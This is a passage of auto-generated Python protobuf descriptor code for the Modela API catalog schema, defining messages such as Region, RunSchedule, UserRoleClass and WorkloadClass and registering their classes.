name='billingCode', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.billingCode', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datacenters', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.datacenters', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6302,
serialized_end=6484,
)
_RESOURCESPEC = _descriptor.Descriptor(
name='ResourceSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='workloadClassName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec.workloadClassName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec.enable', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='requirements', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec.requirements', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6486,
serialized_end=6607,
)
_ROCAUCCURVE = _descriptor.Descriptor(
name='RocAucCurve',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RocAucCurve',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='values', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RocAucCurve.values', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6609,
serialized_end=6707,
)
_RUNSCHEDULE = _descriptor.Descriptor(
name='RunSchedule',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='enabled', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.enabled', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='startTime', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.startTime', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='endTime', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.endTime', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cron', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.cron', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.type', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6710,
serialized_end=6897,
)
_STAKEHOLDER = _descriptor.Descriptor(
name='StakeHolder',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.StakeHolder',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='accountName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.StakeHolder.accountName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='roles', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.StakeHolder.roles', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6899,
serialized_end=6948,
)
_USERROLECLASS = _descriptor.Descriptor(
name='UserRoleClass',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6951,
serialized_end=7124,
)
_USERROLECLASSLIST = _descriptor.Descriptor(
name='UserRoleClassList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7127,
serialized_end=7299,
)
_USERROLECLASSSPEC = _descriptor.Descriptor(
name='UserRoleClassSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='rules', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassSpec.rules', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7301,
serialized_end=7367,
)
_VIZURI = _descriptor.Descriptor(
name='VizUri',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.VizUri',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.VizUri.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='uri', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.VizUri.uri', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7369,
serialized_end=7404,
)
_WORKLOADCLASS = _descriptor.Descriptor(
name='WorkloadClass',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7407,
serialized_end=7580,
)
_WORKLOADCLASSLIST = _descriptor.Descriptor(
name='WorkloadClassList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7583,
serialized_end=7755,
)
_WORKLOADCLASSSPEC = _descriptor.Descriptor(
name='WorkloadClassSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resourcesTemplate', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.resourcesTemplate', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='frameworks', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.frameworks', index=1,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='libs', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.libs', index=2,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='os', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.os', index=3,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='osVersion', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.osVersion', index=4,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7758,
serialized_end=8002,
)
_ALGORITHM.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_ALGORITHM.fields_by_name['spec'].message_type = _ALGORITHMSPEC
_ALGORITHMLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_ALGORITHMLIST.fields_by_name['items'].message_type = _ALGORITHM
_ALGORITHMSPEC.fields_by_name['integerParameters'].message_type = _INTPARAMETER
_ALGORITHMSPEC.fields_by_name['floatParameters'].message_type = _FLOATPARAMETER
_ALGORITHMSPEC.fields_by_name['categoricalParameters'].message_type = _CATEGORICALPARAMETER
_CLOUD.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_CLOUD.fields_by_name['spec'].message_type = _CLOUDSPEC
_CLOUD.fields_by_name['status'].message_type = _CLOUDSTATUS
_CLOUDLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_CLOUDLIST.fields_by_name['items'].message_type = _CLOUD
_CLOUDSPEC.fields_by_name['machineClasses'].message_type = _MACHINECLASS
_CLOUDSPEC.fields_by_name['gpuClasses'].message_type = _GPUCLASS
_CLOUDSPEC.fields_by_name['regions'].message_type = _REGION
_CLOUDSTATUS.fields_by_name['machineCosts'].message_type = _MACHINECLASSCOST
_CLOUDSTATUS.fields_by_name['gpuCosts'].message_type = _GPUCLASSCOST
_CONFUSIONMATRIX.fields_by_name['rows'].message_type = _CONFUSIONMATRIXROW
_GPUCLASS.fields_by_name['gpumem'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_GPUCLASSCOST.fields_by_name['costPerMinute'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_GPUCLASSCOST.fields_by_name['costSpot'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_MLFRAMEWORK.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_MLFRAMEWORK.fields_by_name['spec'].message_type = _MLFRAMEWORKSPEC
_MLFRAMEWORKLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_MLFRAMEWORKLIST.fields_by_name['items'].message_type = _MLFRAMEWORK
_MACHINECLASS.fields_by_name['mem'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_MACHINECLASSCOST.fields_by_name['costPerMinute'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_MACHINECLASSCOST.fields_by_name['costSpot'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_MODELDEPLOYMENTSTATUS.fields_by_name['deploymentRef'].message_type = k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2._OBJECTREFERENCE
_MODELDEPLOYMENTSTATUS.fields_by_name['serviceRef'].message_type = k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2._OBJECTREFERENCE
_MODELDEPLOYMENTSTATUS.fields_by_name['lastPredictionTime'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_MODELDEPLOYMENTSTATUS.fields_by_name['deployedAt'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_MODELDEPLOYMENTSTATUS.fields_by_name['releasedAt'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_MODELDEPLOYMENTSTATUS.fields_by_name['approvedAt'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_NOTIFICATIONSPEC_SELECTORENTRY.containing_type = _NOTIFICATIONSPEC
_NOTIFICATIONSPEC.fields_by_name['selector'].message_type = _NOTIFICATIONSPEC_SELECTORENTRY
_PRCURVE.fields_by_name['values'].message_type = _CURVEPOINT
_PRETRAINEDMODEL.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_PRETRAINEDMODEL.fields_by_name['spec'].message_type = _PRETRAINEDMODELSPEC
_PRETRAINEDMODELLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_PRETRAINEDMODELLIST.fields_by_name['items'].message_type = _PRETRAINEDMODEL
_PUBLICDATASET.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_PUBLICDATASET.fields_by_name['spec'].message_type = _PUBLICDATASETSPEC
_PUBLICDATASETLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_PUBLICDATASETLIST.fields_by_name['items'].message_type = _PUBLICDATASET
_REGION.fields_by_name['datacenters'].message_type = _DATACENTER
_RESOURCESPEC.fields_by_name['requirements'].message_type = k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2._RESOURCEREQUIREMENTS
_ROCAUCCURVE.fields_by_name['values'].message_type = _CURVEPOINT
_RUNSCHEDULE.fields_by_name['startTime'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_RUNSCHEDULE.fields_by_name['endTime'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIMESTAMP
_USERROLECLASS.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_USERROLECLASS.fields_by_name['spec'].message_type = _USERROLECLASSSPEC
_USERROLECLASSLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_USERROLECLASSLIST.fields_by_name['items'].message_type = _USERROLECLASS
_USERROLECLASSSPEC.fields_by_name['rules'].message_type = k8s_dot_io_dot_api_dot_rbac_dot_v1_dot_generated__pb2._POLICYRULE
_WORKLOADCLASS.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_WORKLOADCLASS.fields_by_name['spec'].message_type = _WORKLOADCLASSSPEC
_WORKLOADCLASSLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_WORKLOADCLASSLIST.fields_by_name['items'].message_type = _WORKLOADCLASS
_WORKLOADCLASSSPEC.fields_by_name['resourcesTemplate'].message_type = _RESOURCESPEC
_WORKLOADCLASSSPEC.fields_by_name['libs'].message_type = _LIB
DESCRIPTOR.message_types_by_name['Algorithm'] = _ALGORITHM
DESCRIPTOR.message_types_by_name['AlgorithmList'] = _ALGORITHMLIST
DESCRIPTOR.message_types_by_name['AlgorithmSpec'] = _ALGORITHMSPEC
DESCRIPTOR.message_types_by_name['CategoricalParameter'] = _CATEGORICALPARAMETER
DESCRIPTOR.message_types_by_name['Cloud'] = _CLOUD
DESCRIPTOR.message_types_by_name['CloudList'] = _CLOUDLIST
DESCRIPTOR.message_types_by_name['CloudSpec'] = _CLOUDSPEC
DESCRIPTOR.message_types_by_name['CloudStatus'] = _CLOUDSTATUS
DESCRIPTOR.message_types_by_name['CompilerSpec'] = _COMPILERSPEC
DESCRIPTOR.message_types_by_name['ConfusionMatrix'] = _CONFUSIONMATRIX
DESCRIPTOR.message_types_by_name['ConfusionMatrixRow'] = _CONFUSIONMATRIXROW
DESCRIPTOR.message_types_by_name['CurvePoint'] = _CURVEPOINT
DESCRIPTOR.message_types_by_name['DataCenter'] = _DATACENTER
DESCRIPTOR.message_types_by_name['FloatParameter'] = _FLOATPARAMETER
DESCRIPTOR.message_types_by_name['GithubEvents'] = _GITHUBEVENTS
DESCRIPTOR.message_types_by_name['GpuClass'] = _GPUCLASS
DESCRIPTOR.message_types_by_name['GpuClassCost'] = _GPUCLASSCOST
DESCRIPTOR.message_types_by_name['IntParameter'] = _INTPARAMETER
DESCRIPTOR.message_types_by_name['Lib'] = _LIB
DESCRIPTOR.message_types_by_name['Logs'] = _LOGS
DESCRIPTOR.message_types_by_name['MLFramework'] = _MLFRAMEWORK
DESCRIPTOR.message_types_by_name['MLFrameworkList'] = _MLFRAMEWORKLIST
DESCRIPTOR.message_types_by_name['MLFrameworkSpec'] = _MLFRAMEWORKSPEC
DESCRIPTOR.message_types_by_name['MachineClass'] = _MACHINECLASS
DESCRIPTOR.message_types_by_name['MachineClassCost'] = _MACHINECLASSCOST
DESCRIPTOR.message_types_by_name['Measurement'] = _MEASUREMENT
DESCRIPTOR.message_types_by_name['ModelDeploymentSpec'] = _MODELDEPLOYMENTSPEC
DESCRIPTOR.message_types_by_name['ModelDeploymentStatus'] = _MODELDEPLOYMENTSTATUS
DESCRIPTOR.message_types_by_name['NotificationSpec'] = _NOTIFICATIONSPEC
DESCRIPTOR.message_types_by_name['PRCurve'] = _PRCURVE
DESCRIPTOR.message_types_by_name['PretrainedModel'] = _PRETRAINEDMODEL
DESCRIPTOR.message_types_by_name['PretrainedModelList'] = _PRETRAINEDMODELLIST
DESCRIPTOR.message_types_by_name['PretrainedModelSpec'] = _PRETRAINEDMODELSPEC
DESCRIPTOR.message_types_by_name['PublicDataset'] = _PUBLICDATASET
DESCRIPTOR.message_types_by_name['PublicDatasetList'] = _PUBLICDATASETLIST
DESCRIPTOR.message_types_by_name['PublicDatasetSpec'] = _PUBLICDATASETSPEC
DESCRIPTOR.message_types_by_name['Region'] = _REGION
DESCRIPTOR.message_types_by_name['ResourceSpec'] = _RESOURCESPEC
DESCRIPTOR.message_types_by_name['RocAucCurve'] = _ROCAUCCURVE
DESCRIPTOR.message_types_by_name['RunSchedule'] = _RUNSCHEDULE
DESCRIPTOR.message_types_by_name['StakeHolder'] = _STAKEHOLDER
DESCRIPTOR.message_types_by_name['UserRoleClass'] = _USERROLECLASS
DESCRIPTOR.message_types_by_name['UserRoleClassList'] = _USERROLECLASSLIST
DESCRIPTOR.message_types_by_name['UserRoleClassSpec'] = _USERROLECLASSSPEC
DESCRIPTOR.message_types_by_name['VizUri'] = _VIZURI
DESCRIPTOR.message_types_by_name['WorkloadClass'] = _WORKLOADCLASS
DESCRIPTOR.message_types_by_name['WorkloadClassList'] = _WORKLOADCLASSLIST
DESCRIPTOR.message_types_by_name['WorkloadClassSpec'] = _WORKLOADCLASSSPEC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Algorithm = _reflection.GeneratedProtocolMessageType('Algorithm', (_message.Message,), {
'DESCRIPTOR' : _ALGORITHM,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm)
})
_sym_db.RegisterMessage(Algorithm)
AlgorithmList = _reflection.GeneratedProtocolMessageType('AlgorithmList', (_message.Message,), {
'DESCRIPTOR' : _ALGORITHMLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmList)
})
_sym_db.RegisterMessage(AlgorithmList)
AlgorithmSpec = _reflection.GeneratedProtocolMessageType('AlgorithmSpec', (_message.Message,), {
'DESCRIPTOR' : _ALGORITHMSPEC,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec)
})
_sym_db.RegisterMessage(AlgorithmSpec)
CategoricalParameter = _reflection.GeneratedProtocolMessageType('CategoricalParameter', (_message.Message,), {
'DESCRIPTOR' : _CATEGORICALPARAMETER,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter)
})
_sym_db.RegisterMessage(CategoricalParameter)
Cloud = _reflection.GeneratedProtocolMessageType('Cloud', (_message.Message,), {
'DESCRIPTOR' : _CLOUD,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
# @@protoc_insertion_point(class_scope:github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Cloud)
})
_sym_db.RegisterMessage(Cloud)
CloudList = _reflection.GeneratedProtocolMessageType('CloudList', (_message.Message,), {
'DESCRIPTOR' : _CLOUDLIST,
'__module__' : 'github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.generated_pb2'
